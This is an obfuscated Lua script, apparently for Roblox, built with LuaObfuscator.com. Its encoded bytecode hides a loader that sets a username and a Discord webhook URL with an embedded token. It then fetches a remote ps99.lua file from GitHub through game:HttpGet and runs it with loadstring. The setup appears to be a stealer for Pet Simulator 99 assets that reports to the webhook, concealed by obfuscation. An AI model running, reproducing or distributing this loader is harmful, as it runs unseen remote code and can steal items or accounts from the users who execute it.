--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v98=v5(v82,v19);v19=nil;return v98;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -(1 + 0))) -(v32-((883 -263) -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(1067 -(68 + 997))^(v32-((2198 -(226 + 1044)) -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(655 + 237 + 65))) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (610 -354)) + v38 ;end if (v37==((0 -0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v37=181 -(67 + 84 + 29) ;end end end local function v24() local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,53 -(475 -(416 + 26)) ) * ((3 -1)^(24 + 8))) + v42 ;local v46=v20(v43,(3250 -2232) -(915 + 82) ,87 -56 );local v47=((v20(v43,19 + 13 )==(1 -0)) and  -((510 + 678) -(1069 + 118))) or (2 -1) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + (0 -0)) ;else v46=1 -0 ;v44=438 -(145 + 293) ;end elseif (v46==(2031 + 16)) then return ((v45==0) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -((440 -(44 + 386)) + 8)) ) * (v44 + (v45/((7 -5)^52))) ;end local function v25(v48) local v49=1486 -(998 + 488) ;local v50;local v51;while true do if (v49==(1 + (0 -0))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=774 -(201 + 31 + 540) ;end if (v49==(1141 -(116 + 362 + 660))) then return v6(v51);end if (v49==(0 -0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=3 -2 ;end if (v49==2) then v51={};for v87=(888 -(261 + 624)) -2 , #v50 do v51[v87]=v2(v1(v3(v50,v87,v87)));end v49=862 -(814 + 45) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1824 -(1195 + 629) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v65=(function() return 0;end)();while true do if (v65==0) then if ((0 -0)==v52) then local v95=(function() return 0;end)();while true do if (v95==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v95=(function() return 243 -(187 + 54) ;end)();end if (v95==0) then v53=(function() return {};end)();v54=(function() return {};end)();v95=(function() return 781 -(162 + 618) ;end)();end if (v95~=2) then else v52=(function() return  #"~";end)();break;end end end if (v52~= #"!") then else local v96=(function() return 0 + 0 ;end)();local v97=(function() return;end)();while true do if (v96~=(0 + 0)) then else v97=(function() return 0 -0 ;end)();while true do if (v97~=2) then else v52=(function() return 2 -0 ;end)();break;end if (v97==1) then for v110= #">",v57 do local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (1==v111) then v114=(function() return nil;end)();while true do if ( #"|"~=v112) then else if (v113== #"~") then v114=(function() return v21()~=(0 + 0) ;end)();elseif (v113==2) then v114=(function() return v24();end)();elseif (v113== #"91(") then v114=(function() return v25();end)();end v58[v110]=(function() return v114;end)();break;end if (v112~=(1636 -(1373 + 263))) then else local v170=(function() return 1000 -(451 + 549) ;end)();while true do if (v170==1) then v112=(function() return  #",";end)();break;end if ((0 + 0)==v170) then v113=(function() return v21();end)();v114=(function() return nil;end)();v170=(function() return 1;end)();end end end end break;end if (v111==0) then local v161=(function() return 0;end)();while true do if (v161==1) then v111=(function() return 1 -0 ;end)();break;end if (v161==0) then v112=(function() return 0 -0 ;end)();v113=(function() return nil;end)();v161=(function() return 1385 -(746 + 638) ;end)();end end end end end v56[ #"91("]=(function() return v21();end)();v97=(function() return 1 + 1 ;end)();end if (v97==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v97=(function() return 1;end)();end end break;end end end v65=(function() return 1 -0 ;end)();end if ((342 -(218 + 123))==v65) then if ((1583 -(1535 + 46))==v52) then for v99= #"{",v23() do local v100=(function() return v21();end)();if (v20(v100, #"<", #">")==0) then local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103~=1) then else local v109=(function() return 0;end)();while true do if (v109==0) then v106=(function() return nil;end)();v107=(function() return nil;end)();v109=(function() return 1;end)();end if (v109==(1 + 0)) then v103=(function() return 1 + 1 ;end)();break;end end end if (v103~=2) then else while true do if (v104== #"}") then local v134=(function() return 0;end)();local v135=(function() return;end)();while true do if (v134==(560 -(306 + 254))) then v135=(function() return 0;end)();while true do if (v135==0) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 -0)) then local v175=(function() return 1467 -(899 + 568) ;end)();local v176=(function() return;end)();while true do if ((0 + 0)==v175) then v176=(function() return 0;end)();while true do if ((0 -0)==v176) then v107[ #"xxx"]=(function() return v22();end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"{") then v107[ #"19("]=(function() return v23();end)();elseif (v105==(605 -(268 + 335))) then v107[ #"xxx"]=(function() return v23() -((292 -(60 + 230))^16) ;end)();elseif (v105== #"xnx") then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183~=0) then else v184=(function() return 0;end)();while true do if (v184==0) then v107[ #"nil"]=(function() return v23() -((574 -(426 + 146))^(2 + 14)) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end break;end end end v135=(function() return 1;end)();end if (v135==1) then v104=(function() return 2;end)();break;end end break;end end end if (v104==2) then local v136=(function() return 1456 -(282 + 1174) ;end)();local v137=(function() return;end)();while true do if (v136==(811 -(569 + 242))) then v137=(function() return 0;end)();while true do if (v137~=(2 -1)) then else v104=(function() return  #"-19";end)();break;end if (v137~=0) then else if (v20(v106, #",", #"!")== #"|") then v107[1 + 1 ]=(function() return v58[v107[2]];end)();end if (v20(v106,2,1026 -(706 + 318) )~= #"|") then else v107[ #"gha"]=(function() return v58[v107[ #"xxx"]];end)();end v137=(function() return 1252 -(721 + 530) ;end)();end end break;end end end if ( #"xxx"==v104) then if (v20(v106, #"91(", #"-19")~= #"]") then else v107[ #"xnxx"]=(function() return v58[v107[ #"?id="]];end)();end v53[v99]=(function() return v107;end)();break;end if (v104~=0) then else local v139=(function() return 0;end)();local v140=(function() return;end)();while true do if (v139==0) then v140=(function() return 1271 -(945 + 326) ;end)();while true do if (v140==0) then v105=(function() return v20(v100,4 -2 , #"91(");end)();v106=(function() return v20(v100, #"0313",6);end)();v140=(function() return 1;end)();end if (v140~=(1 + 0)) then else v104=(function() return  #"/";end)();break;end end break;end end end end break;end if (v103==0) then v104=(function() return 0;end)();v105=(function() return nil;end)();v103=(function() return 701 -(271 + 429) ;end)();end end end end for v101= #"[",v23() do v54[v101-#"<" ]=(function() return v28();end)();end return v56;end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1502 -(1408 + 92) ];local v64=v59[1089 -(461 + 625) ];return function(...) local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=1289 -(993 + 295) ;local v71= -(1 + (0 -0));local v72={};local v73={...};local v74=v12("#",...) -(1 + (0 -0)) ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 + 0 ];end end local v77=(v74-v68) + 1 + 0 ;local v78;local v79;while true do local v86=(0 -0) + 0 ;while true do if (v86==(0 + 0)) then v78=v66[v70];v79=v78[530 -(406 + 123) ];v86=(2008 -(64 + 174)) -(250 + 1499 + 20) ;end if (v86==(1 + 0)) then if (v79<=(1331 -(1249 + 73))) then if ((630<2127) and (v79<=(2 + 2))) then if (v79<=(1146 -(466 + 679))) then if (v79>(0 -0)) then v70=v78[(11 -3) -5 ];else v70=v78[1903 -(106 + 1794) ];end elseif (v79<=(5 -3)) then if (v76[v78[1 + (337 -(144 + 192)) ]]==v78[(4 -2) + 2 ]) then v70=v70 + (2 -1) ;else v70=v78[7 -4 ];end elseif (v79>(117 -(4 + 110))) then local v142=(800 -(42 + 174)) -(57 + 527) ;local v143;local v144;local v145;local v146;while true do if (v142==(1428 -(41 + 1386))) then v71=(v145 + v143) -1 ;v146=103 -(17 + 86) ;v142=2 + 0 ;end if (v142==(0 -0)) then v143=v78[5 -3 ];v144,v145=v69(v76[v143](v13(v76,v143 + (167 -(122 + 34 + 10)) ,v78[3 + 0 ])));v142=1 -0 ;end if (v142==(6 -4)) then for v171=v143,v71 do local v172=0 + 0 ;while true do if (v172==(0 + 0)) then v146=v146 + (1 -0) ;v76[v171]=v144[v146];break;end end end break;end end else v76[v78[2]]=v78[68 -(30 + 15 + 20) ];end elseif ((v79<=((1509 -(363 + 1141)) + 1)) or (1938==2514)) then if (v79>(1262 -((2623 -(1183 + 397)) + (651 -437)))) then do return;end else local v117=0 -0 ;local v118;while true do if (v117==0) then v118=v78[2];v76[v118]=v76[v118](v13(v76,v118 + (1213 -(323 + 889)) ,v71));break;end end end elseif ((4255>=55) and (v79<=(3 + 4))) then v76[v78[2]]=v78[7 -4 ];elseif (v79>8) then local v149=v78[2];local v150,v151=v69(v76[v149](v13(v76,v149 + ((2807 -2226) -(361 + 219)) ,v78[3])));v71=(v151 + v149) -(321 -(53 + 267)) ;local v152=0 + 0 ;for v164=v149,v71 do v152=v152 + (414 -(15 + 398)) ;v76[v164]=v150[v152];end else v76[v78[(722 + 262) -(18 + (1717 -(239 + 514))) ]]();end elseif ((2999>1156) and (v79<=(52 -38))) then if (v79<=(7 + 4)) then if ((2350>1155) and (v79>(7 + 3))) then local v121=v78[2];v76[v121]=v76[v121](v13(v76,v121 + 1 ,v71));elseif ((4029<=4853) and (v76[v78[1 + 1 ]]==v78[4])) then v70=v70 + (851 -(20 + 830)) ;else v70=v78[3 + (1329 -(797 + 532)) ];end elseif (v79<=(138 -(116 + 10))) then local v123=v78[1 + 1 ];local v124=v76[v78[741 -(406 + 136 + 196) ]];v76[v123 + (1 -0) ]=v124;v76[v123]=v124[v78[4]];elseif (v79>(4 + 9)) then v76[v78[2 + 0 ]]();else do return;end end elseif ((v79<=(6 + 10)) or (516>3434)) then if (v79>(39 -(1999 -(1913 + 62)))) then v61[v78[(6 + 1) -4 ]]=v76[v78[(524 + 1029) -(1126 + 425) ]];else v76[v78[407 -(118 + 287) ]]=v61[v78[(7 + 4) -8 ]];end elseif (v79<=(39 -22)) then v76[v78[1123 -(118 + 1003) ]]=v61[v78[8 -(1207 -(373 + 829)) ]];elseif ((4046>=3033) and (v79==((1045 -650) -((2075 -(565 + 1368)) + (966 -(476 + 255)))))) then v61[v78[13 -10 ]]=v76[v78[1 + 1 ]];else local v156=v78[979 -((2079 -1526) + (1554 -(369 + 761))) ];local v157=v76[v78[5 -(2 + 0) ]];v76[v156 + 1 + 0 ]=v157;v76[v156]=v157[v78[4 + 0 ]];end v70=v70 + (1 -0) + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C756103083O00557365726E616D65030D3O006D6F68616D656474616861656803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135363332333036303538302O38343533312F62494D614658544C616C3271705256555F64422O456835324D69484C4630757864734F7A5830742D34366D364A3470626668524754464E436F74476F6870307257414D7A00143O0012033O00013O0026023O000B0001000200044O000B0001001211000100033O001211000200043O002013000200020005001203000400064O0004000200044O000500013O00022O000800010001000100044O001300010026023O00010001000100044O00010001001203000100083O002O12000100073O0012030001000A3O002O12000100093O0012033O00023O00044O000100012O000D3O00017O00",v9(),...);
